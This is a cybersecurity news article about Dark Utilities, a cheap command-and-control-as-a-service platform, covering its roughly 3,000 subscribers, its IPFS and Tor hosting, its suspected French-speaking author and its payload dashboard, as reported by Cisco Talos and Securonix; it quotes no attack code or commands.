C2-as-a-Service Portal Dark Utilities Now Boasts Over 3,000 Criminal Subscribers
Dark Utilities C2aaS enables remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations.
Security researchers at Cisco Talos discovered a new tool dubbed Dark Utilities that offers command and control or C2 as a service (C2aaS) infrastructure for hackers that seek a quick and easy way to support their malicious operations.
Released in early 2022, Dark Utilities currently has around 3,000 users enrolled, according to the latest data by security analytics and operations management company Securonix. The tool provides services for remote access, command execution, distributed denial-of-service (DDoS) attacks, and cryptocurrency mining operations.
Securonix termed Dark Utilities “a C2 platform that provides adversaries with full-featured capabilities.” It supports adversaries comfortable with Windows, Linux, macOS, Android, and Python-based implementations.
Dark Utilities is the brainchild of a relatively unknown actor in cybercrime, who goes by the moniker Inplex-sys. Cisco Talos assessed them to be French-speaking who also converses in English. Inplex-sys limited their activities to Telegram and Discord before releasing Dark Utilities.
Inplex-sys could have ties to the Lapsus$ cyber extortion group that victimized Samsung, NVIDIA, Ubisoft, Okta, Globant, and others. Talos discovered an inplex-sys record on Doxbin, a doxing site once owned and managed by the now arrested 16-year-old member of Lapsus$. Inplex-sys records on Doxbin led Talos to believe they are either in Germany or France.
Dark Utilities leverages the Interplanetary File System (IPFS) instead of HTTP/HTTPS for peer-to-peer file sharing, thus excluding it from the purview of law enforcement and related interference. Like the Tor2Web network, IPFS is decentralized, gateway-driven, and doesn’t require an application installed on a computer to access its content distribution network (CDN).
See More: Lazarus Hackers Exploiting Log4j Vulnerabilities to Target U.S. Energy Companies
One of the more essential components of hacking, malicious or otherwise, a C2 server, as the name suggests, serves as a single point of control for targeted attacks using malware. It allows the propagators of the attack to communicate with, send commands/new additional payloads to, and store stolen data from the victim system.
Dark Utilities’ C2aaS offers all of this at a starting price of a meager €9.99. Dark Utilities is hosted on the Tor network as well as the open internet. “The dirt cheap subscription plan of the Dark Utilities would encourage more amateurs and script kiddies to enroll in the service and execute attacks without having ample knowledge of cyber attacks,” opined researchers at K7 Security.
“For instance, from the RaaS revenue model, anyone can figure out how remote attacks would multifold with the arrival of C2aaS. The RaaS services usually appoint affiliates and offer a cut of the ransom money. However, C2aaS would allow anyone to launch cyberattacks on any system without the necessary knowledge or resources.”
User authentication is done over Discord. Once authenticated, users are taken to a dashboard where they are prompted to generate new payloads specific to the OS on the target machine that the user/threat actors aim to victimize and deploy through the same dashboard.
“Selecting an operating system causes the platform to generate a command string that threat actors are typically embedding into PowerShell or Bash scripts to facilitate the retrieval and execution of the payload on victim machines. An example of this for a payload targeting the Windows operating system is shown below,” Talon explained.
Besides the run-of-the-mill OS’, Dark Utilities also supports payload creation for Fivem and underlying architectures ARM64 and ARMV71 to enable attacks against embedded, internet-connected devices such as routers, phones, and internet-of-things (IoT) devices.
For payload/bot management, Dark Utilities has an administrative panel that lists all victim systems. This allows users to control malicious operations in one place. The dashboard also gives a peek into several attack metrics, such as server health and platform statistics.
Dark Utilities C2aaS Dashboard | Source: Cisco Talos
The 71 indicators of compromise (IOCs) of Dark Utilities are available on the Securonix website.
Let us know if you enjoyed reading this news on LinkedIn, Twitter, or Facebook. We would love to hear from you!
MORE ON CYBER THREATS
